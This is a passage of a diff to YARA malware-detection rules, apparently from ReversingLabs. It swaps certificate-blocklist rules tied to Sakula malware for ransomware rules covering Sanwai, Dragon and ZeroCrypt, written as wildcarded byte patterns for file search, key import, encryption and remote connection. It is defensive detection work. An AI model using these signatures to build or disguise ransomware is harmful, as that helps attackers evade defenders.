?? 8B 45 ?? 8D 8D ?? ?? ?? ?? 51 50 8B 47 ?? FF D0 85 C0 8B 45 ?? 0F 85 ?? + ?? ?? ?? 50 8B 47 ?? FF D0 85 F6 74 ?? 8B 55 ?? 33 C0 8B CF 66 89 43 ?? E8 ?? ?? ?? + ?? FF 75 ?? 8B 47 ?? 6A ?? FF 77 ?? FF D0 8B 45 ?? 8B 5D ?? 03 C6 03 D8 8B 45 ?? 40 + 89 5D ?? 89 45 ?? BA ?? ?? ?? ?? 83 F8 ?? 0F 8E ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? + ?? ?? ?? 50 8B 47 ?? 68 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B CF E8 + ?? ?? ?? ?? 83 C4 ?? 03 C3 5F 5E 5B 8B E5 5D C3 33 C9 33 C0 66 3B CF 74 ?? 0F B7 CF + 33 D2 8D 9B ?? ?? ?? ?? 40 66 89 4C 1A ?? 8D 14 00 33 F6 0F B7 8C 15 ?? ?? ?? ?? 66 + 3B F1 75 ?? 8B 75 ?? FF 75 ?? 8B 7D ?? 33 C9 46 57 66 89 4C 43 ?? 89 75 ?? E8 ?? ?? + ?? ?? E9 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DTOPTOOLZ Co.,Ltd." and pe.signatures[i].serial=="47:d5:d5:37:2b:cb:15:62:b4:c9:f4:c2:bd:f1:35:87" and 1400803199<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and (( all of ($search_and_encrypt_*))) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_3Ac10E68F1Ce519E84Ddcd28B11Fa542 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Sanwai : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing Sakula malware." + description = "Yara rule that detects Sanwai ransomware." author = "ReversingLabs" - id = "9cc0e518-84c8-5b23-b8cb-e0e0fe7849bd" - date = "2023-11-08" - modified = "2023-11-08" + id = "01912621-4a34-5e34-8542-5b561e8da567" + date = "2021-11-11" + modified = "2021-11-11" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2104-L2120" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "dac3b6b7609ec1e82afe4f9c6c14e2d32b6f5d8d49c59d6c605f2a94d71bc107" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Sanwai.yara#L1-L71" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a7a95b2403fe539dce0d856cc1c04d15440677ea39c0a22e818b42333a64e92c" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Sanwai" + tc_detection_factor = 5 importance = 25 + strings: + $find_files = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ?? + 33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 55 ?? 8B D9 83 7B ?? ?? 8B F3 8B 45 ?? 8B 7D + ?? 89 45 ?? 72 ?? 8B 33 8D 4E ?? 66 8B 06 83 C6 ?? 66 85 C0 75 ?? 2B F1 D1 FE 0F 84 + ?? ?? ?? ?? 3B 73 ?? 0F 85 ?? ?? ?? ?? 88 45 ?? 8D 55 ?? FF 75 ?? 8D 4D ?? C7 45 ?? + ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? C7 45 ?? ?? ?? ?? + ?? 50 8B CB E8 ?? ?? ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B + C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76 ?? FF 15 ?? + ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7B ?? ?? 72 ?? 8B 1B 8B 75 ?? 57 56 53 E8 + ?? ?? ?? ?? 85 C0 75 ?? 8B 36 8B CF E8 ?? ?? ?? ?? 84 C0 74 ?? 57 56 E8 ?? ?? ?? ?? + 85 C0 75 ?? 8B CF E8 ?? ?? ?? ?? 84 C0 75 ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 + 5F 5E 5B 8B E5 5D C3 83 F8 ?? 75 ?? 8B 4D ?? D1 E9 F6 C1 ?? B9 ?? ?? ?? ?? 0F 45 C1 + 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C3 B8 ?? ?? ?? ?? 8B 4D ?? 64 89 + 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C3 + } + $import_key = { + 8D 44 24 ?? 50 6A ?? 6A ?? 6A ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 5E 85 + C0 75 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 32 C0 5F 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? + 83 C4 ?? C3 8B 44 24 ?? FF 74 24 ?? 8B 08 8B 40 ?? 89 47 ?? 8D 44 24 ?? 50 57 6A ?? + 6A ?? 6A ?? FF 74 24 ?? 89 0F FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 6A ?? + FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? B0 ?? 5F 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3 + } + $encrypt_files = { + 8B 01 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83 EE ?? 73 ?? 8A 01 3A 02 75 ?? 83 FE ?? 74 ?? + 8A 41 ?? 3A 42 ?? 75 ?? 8A 41 ?? 3A 42 ?? 75 ?? 8A 41 ?? 3A 42 ?? 75 ?? 33 C0 EB ?? + 1B C0 83 C8 ?? 85 C0 75 ?? 8B 5D ?? 8B 7D ?? C6 85 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B + BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B CF E8 ?? ?? ?? ?? 51 C6 45 ?? ?? 8D 4D ?? 8B + 9D ?? ?? ?? ?? 51 83 CB ?? 8B C8 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 CB ?? ?? ?? ?? + C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 83 CB ?? 83 7D ?? ?? 89 9D ?? ?? ?? ?? 0F 43 4D ?? 83 + 7D ?? ?? 89 9D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 8B 01 3B + 02 75 ?? 83 C1 ?? 83 C2 ?? 83 EE ?? 73 ?? 8A 01 3A 02 75 ?? 83 FE ?? 74 ?? 8A 41 ?? + 3A 42 ?? 75 ?? 8A 41 ?? 3A 42 ?? 75 ?? 8A 41 ?? 3A 42 ?? 75 ?? 33 C0 EB ?? 1B C0 83 + C8 ?? 85 C0 75 ?? 8B 5D ?? 8B 7D ?? C6 85 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 45 ?? 8B + CF 50 E8 ?? ?? ?? ?? 51 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 51 83 CB ?? 8B C8 89 9D ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8B 7D ?? 8D 4D ?? 81 CB ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8B 5D ?? + 83 FB ?? 0F 43 CF 83 7D ?? ?? 0F 85 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "U-Tech IT service" and pe.signatures[i].serial=="3a:c1:0e:68:f1:ce:51:9e:84:dd:cd:28:b1:1f:a5:42" and 1420156799<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ($import_key) and ($encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_31062E483E0106B18C982F0053185C36 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Dragon : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing Sakula malware." + description = "Yara rule that detects Dragon ransomware." author = "ReversingLabs" - id = "84bce7c1-efba-5a76-8865-dcfcc8e50d41" - date = "2023-11-08" - modified = "2023-11-08" + id = "dbeab955-f1fe-57eb-a9a4-c8c885ab7fad" + date = "2020-10-30" + modified = "2020-10-30" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2122-L2138" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e45fc5b4d1b9f5cd35c56aad381e26e30675a9d99747cd318f3c77ea2af0e14a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Dragon.yara#L1-L149" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7298c5681deaf04abb6a656cefc09b5ee4096ff7a5028caab1d7b107e97be90a" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Dragon" + tc_detection_factor = 5 importance = 25 + strings: + $remote_connection_p1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? + 33 C5 89 45 ?? 56 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A + ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? + 85 C0 0F 85 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 88 45 ?? 83 EC ?? 89 45 ?? 8B + CC 89 A5 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC E8 ?? + ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? BA ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? + ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 8B D0 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 + 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? + ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? + ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? + ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 + } + $remote_connection_p2 = { + 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? + 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? + ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? + ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F + 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 8D 4D ?? 8D 55 ?? C7 85 ?? + ?? ?? ?? ?? ?? ?? ?? 0F 43 4D ?? 51 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? + ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 83 FA + ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? + 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? + ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B + 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? + 64 89 0D ?? ?? ?? ?? 59 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $find_files_1 = { + 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 83 EC ?? 89 8D ?? + ?? ?? ?? 8B D4 8D 71 ?? C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C6 02 ?? 8A 01 41 + 84 C0 75 ?? 2B CE 8B B5 ?? ?? ?? ?? 51 56 8B CA E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8D + 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 + ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 8B 1D + } + $find_files_2 = { + 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? + 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? + 8A 11 3A 10 75 ?? 84 D2 74 ?? 8A 51 ?? 3A 50 ?? 75 ?? 83 C1 ?? 83 C0 ?? 84 D2 75 ?? + 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? + ?? 56 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 51 8B D4 8D 8D ?? ?? ?? ?? + 8D 71 ?? C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C6 02 ?? 8A 01 41 84 C0 75 ?? 2B + CE 8D 85 ?? ?? ?? ?? 51 50 8B CA E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 74 ?? + 83 EC ?? 8B CC 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 + ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D + 85 ?? ?? ?? ?? 50 57 FF D3 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B 4D ?? 5F + 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $skip_hk_china_taiwan_p1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? + 33 C5 89 45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? + 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 + C0 0F 85 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 88 45 ?? 89 45 ?? 8D 4D ?? 6A ?? + 68 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 88 45 ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D + 4D ?? 83 7D ?? ?? 8D 55 ?? 0F 43 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? + ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? + C7 45 ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? + 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? + C6 45 ?? ?? 8D 4D ?? 6A ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? + C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 83 F8 + ?? 0F 85 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? + ?? ?? 6A ?? 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? + 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 + C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 + ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 + ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 8D ?? + ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 + } + $skip_hk_china_taiwan_p2 = { + 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 + 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? + ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 + C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? B0 ?? + 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 55 ?? + 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 + C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 + ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 + ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 8D ?? + ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? + 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 + 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 + E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? + ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 + 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 32 C0 E9 ?? ?? ?? ?? 6A ?? E8 + ?? ?? ?? ?? E8 + } + $crypt_files = { + 8B FF 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 8B 45 ?? 89 45 ?? 89 + 4D ?? 56 8B 75 ?? 85 C9 75 ?? 33 C0 E9 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ?? ?? ?? 83 20 + ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C8 ?? E9 ?? ?? ?? ?? 53 8B C6 + 8B D6 C1 FA ?? 83 E0 ?? 57 6B F8 ?? 89 55 ?? 8B 14 95 ?? ?? ?? ?? 89 7D ?? 8A 5C 3A + ?? 80 FB ?? 74 ?? 80 FB ?? 75 ?? 8B C1 F7 D0 A8 ?? 75 ?? E8 ?? ?? ?? ?? 83 20 ?? E8 + ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? F6 44 3A ?? ?? 74 ?? 6A + ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 8D 7D ?? AB 56 AB AB E8 ?? ?? ?? ?? + 59 84 C0 74 ?? 84 DB 74 ?? FE CB 80 FB ?? 8B 5D ?? 0F 87 ?? ?? ?? ?? FF 75 ?? 8D 45 + ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 E9 ?? ?? ?? ?? FF 75 ?? 8B 5D ?? 8D 45 ?? 53 + 56 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B 4D ?? 8B 55 ?? 8B 04 8D ?? ?? ?? ?? 80 7C 10 + ?? ?? 7D ?? 0F BE C3 8B 5D ?? 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 83 E8 ?? 75 ?? FF 75 ?? + 8D 45 ?? 53 56 50 E8 ?? ?? ?? ?? EB ?? FF 75 ?? 8D 45 ?? 53 56 50 E8 ?? ?? ?? ?? EB + ?? FF 75 ?? 8D 45 ?? 53 56 50 E8 ?? ?? ?? ?? EB ?? 8B 4C 10 ?? 8D 7D ?? 8B 5D ?? 33 + C0 AB 6A ?? AB AB 8D 45 ?? 50 FF 75 ?? 53 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? + ?? ?? ?? 89 45 ?? 8D 75 ?? 8D 7D ?? A5 A5 A5 8B 4D ?? 8B 55 ?? 8B 45 ?? 85 C0 75 ?? + 8B 45 ?? 85 C0 74 ?? 6A ?? 5E 3B C6 75 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 89 30 EB ?? 50 E8 ?? ?? ?? ?? 59 EB ?? 8B 04 8D ?? ?? ?? ?? F6 44 10 ?? ?? 74 + ?? 80 3B ?? 75 ?? 33 C0 EB ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 20 + ?? 83 C8 ?? EB ?? 2B 45 ?? 5F 5B 8B 4D ?? 33 CD 5E E8 ?? ?? ?? ?? 8B E5 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MICRO DIGITAL INC." and pe.signatures[i].serial=="31:06:2e:48:3e:01:06:b1:8c:98:2f:00:53:18:5c:36" and 1332287999<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($skip_hk_china_taiwan_p*)) and ( all of ($find_files_*)) and ($crypt_files) and ( all of ($remote_connection_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_20D0Ee42Fc901E6B3A8Fefe8C1E6087A : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Zerocrypt : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing Sakula malware." + description = "Yara rule that detects ZeroCrypt ransomware." author = "ReversingLabs" - id = "ba37919a-584b-5ff7-b4d5-5b711cc87b1f" - date = "2023-11-08" - modified = "2023-11-08" + id = "89e47d7f-1ac4-570d-8ae1-30f0acc21462" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2140-L2156" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2225302de1e8fe9f2ad064e19b2b1d9faf90c7cafbebff6ddd0921bf57c5f9e6" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.ZeroCrypt.yara#L1-L94" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "947925206ded187eac31c5046d75ab017869ae3f8dc906f2e5536d4db219f108" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "ZeroCrypt" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_file_1 = { + 55 8B EC 83 E4 ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? + ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56 57 A1 ?? ?? ?? ?? 33 C4 50 8D 84 24 ?? ?? + ?? ?? 64 A3 ?? ?? ?? ?? 8B F2 8B F9 68 ?? ?? ?? ?? 8B D7 8D 4C 24 ?? E8 ?? ?? ?? ?? + 83 C4 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 8B D0 56 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 83 C4 ?? C6 84 24 ?? ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ?? FF 74 24 ?? E8 ?? ?? ?? ?? + 83 C4 ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? 83 7E ?? ?? C7 44 24 ?? ?? ?? ?? ?? 66 89 44 + 24 ?? 72 ?? 8B 16 EB ?? 8B D6 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? + ?? ?? 33 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 + 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? + C6 84 24 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 50 E8 ?? + ?? ?? ?? 83 C4 ?? 8B D6 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B F0 C6 84 24 ?? ?? ?? ?? ?? 8B + D7 68 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 84 24 ?? ?? ?? ?? ?? 8B D0 + 56 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 84 24 ?? ?? ?? ?? ?? 8B D0 68 ?? ?? ?? ?? + 